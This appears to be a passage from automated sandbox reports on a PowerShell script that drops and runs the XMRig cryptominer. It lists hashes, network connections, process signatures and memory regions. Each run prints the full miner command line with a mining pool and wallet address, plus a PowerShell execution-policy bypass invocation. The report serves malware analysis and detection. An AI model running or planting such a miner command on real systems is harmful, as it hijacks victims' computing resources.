C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.229.43:443 | | tcp |
Files
memory/5044-0-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4iuxdw3.rbw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5044-9-0x000001AC90DA0000-0x000001AC90DC2000-memory.dmp
memory/5044-10-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-11-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-12-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-14-0x000001ACA9290000-0x000001ACA92A2000-memory.dmp
memory/5044-15-0x000001ACA9280000-0x000001ACA928A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3444-46-0x000001DF2A520000-0x000001DF2A540000-memory.dmp
memory/3444-47-0x000001DF2BE20000-0x000001DF2BE40000-memory.dmp
memory/3444-48-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/5044-49-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp
memory/3444-51-0x000001DF2BE40000-0x000001DF2BE60000-memory.dmp
memory/3444-52-0x000001DF2BE60000-0x000001DF2BE80000-memory.dmp
memory/5044-50-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/3444-53-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-54-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-57-0x000001DF2BE60000-0x000001DF2BE80000-memory.dmp
memory/3444-56-0x000001DF2BE40000-0x000001DF2BE60000-memory.dmp
memory/3444-55-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-58-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-59-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-60-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-61-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-62-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-63-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-64-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-65-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-66-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-67-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-68-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-69-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-70-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-71-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-72-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-73-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-74-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-75-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-76-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-77-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-78-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-79-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-80-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-81-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-82-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-83-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-84-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-85-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-86-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-87-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-88-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-89-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-90-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-91-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-92-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-93-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-94-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-95-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-96-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-97-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-98-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-99-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-100-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-101-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-102-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-103-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-104-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-105-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-106-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-107-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-108-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-109-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-110-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-111-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-112-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-113-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-114-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-115-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-116-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3352 wrote to memory of 3752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3352 wrote to memory of 3752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy4nc3i3.mx3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3352-9-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-11-0x000002166A300000-0x000002166A322000-memory.dmp
memory/3352-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-15-0x000002166A380000-0x000002166A38A000-memory.dmp
memory/3352-14-0x000002166A390000-0x000002166A3A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3752-46-0x000001DB4F960000-0x000001DB4F980000-memory.dmp
memory/3752-47-0x000001DB4F9B0000-0x000001DB4F9D0000-memory.dmp
memory/3752-48-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3352-52-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3752-49-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3352-51-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3752-50-0x000001DB4F9D0000-0x000001DB4F9F0000-memory.dmp
memory/3752-53-0x000001DB512B0000-0x000001DB512D0000-memory.dmp
memory/3752-54-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-56-0x000001DB4F9D0000-0x000001DB4F9F0000-memory.dmp
memory/3752-55-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-57-0x000001DB512B0000-0x000001DB512D0000-memory.dmp
memory/3752-58-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-59-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-60-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-61-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-62-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-63-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-64-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-65-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-66-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-67-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-68-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-69-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-70-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-71-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-72-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-73-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-74-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-75-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-76-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-77-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-78-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-79-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-80-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-81-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-82-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-83-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-84-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-85-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-86-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-87-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-88-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-89-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-90-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-91-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-92-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-93-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-94-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-95-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-96-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-97-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-98-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-99-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-100-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-101-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-102-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-103-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-104-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-105-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-106-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-107-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-108-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-109-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-110-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-111-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-112-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-113-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-114-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-115-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-116-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:50
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3300 wrote to memory of 4404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3300 wrote to memory of 4404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
memory/3300-0-0x00007FFFA3D03000-0x00007FFFA3D05000-memory.dmp
memory/3300-6-0x000002AA2A640000-0x000002AA2A662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dzgamsc.r3x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3300-11-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-12-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-14-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-15-0x000002AA2B150000-0x000002AA2B162000-memory.dmp
memory/3300-16-0x000002AA2A6C0000-0x000002AA2A6CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4404-47-0x0000017911550000-0x0000017911570000-memory.dmp
memory/4404-48-0x0000017911590000-0x00000179115B0000-memory.dmp
memory/4404-49-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-51-0x00000179115D0000-0x00000179115F0000-memory.dmp
memory/4404-50-0x00000179115B0000-0x00000179115D0000-memory.dmp
memory/4404-52-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/3300-54-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-53-0x00007FFFA3D03000-0x00007FFFA3D05000-memory.dmp
memory/4404-55-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/3300-56-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/4404-57-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-59-0x00000179115D0000-0x00000179115F0000-memory.dmp
memory/4404-58-0x00000179115B0000-0x00000179115D0000-memory.dmp
memory/4404-60-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-61-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-62-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-63-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-64-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-65-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-66-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-67-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-68-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-69-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-70-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-71-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-72-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-73-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-74-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-75-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-76-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-77-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-78-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-79-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-80-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-81-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-82-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-83-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-84-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-85-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-86-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-87-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-88-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-89-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-90-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-91-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-92-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-93-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-94-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-95-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-96-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-97-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-98-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-99-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-100-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-101-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-102-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-103-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-104-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-105-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-106-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-107-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-108-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-109-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-110-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
